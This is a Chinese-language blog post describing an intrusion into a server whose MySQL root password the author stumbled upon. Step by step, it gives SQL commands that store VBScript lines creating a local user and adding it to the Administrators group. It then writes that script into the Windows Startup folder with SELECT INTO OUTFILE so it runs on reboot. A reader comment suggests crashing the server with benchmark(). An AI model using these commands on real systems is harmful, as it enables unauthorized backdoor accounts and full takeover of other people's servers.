mysql的入侵

今天在弄台服务器,无意中发现了MYSQL的ROOT用户密码,哈,看来运气不错哈

首先在TEST数据库下创建一个新的表;
mysql>create table a (cmd text);
好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。

在表中插入内容

mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1/add"",0) " );

mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0) " );

注意双引号和括号以及后面的“0”一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!

好了,现在我们来看看表a中有些什么

mysql>select * from a;

我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步

输出表为一个VBS的脚本文件

mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\4.vbs";

我们把我们表中的内容输入到启动组中,是一个VBS的脚本文件!注意“\"符号。

因为select sys_name("XX")用不了,
reate Function FunctionName Returns [String|Integer|Real] Soname..
也不能运行,好像没有什么办法了,在网上找一圈,没有看到什么好的办法,
现在只好等服务器重启了

上一篇: 另类思路入侵
下一篇: 对中国红客联盟的一次测试

访客评论
#1
回复 qiuren 2007-05-08, 00:50:01
貌似用盲注入中用到的benchmark()函数可以挂掉服务器~~仅供参考
发表评论

评论内容 (必填):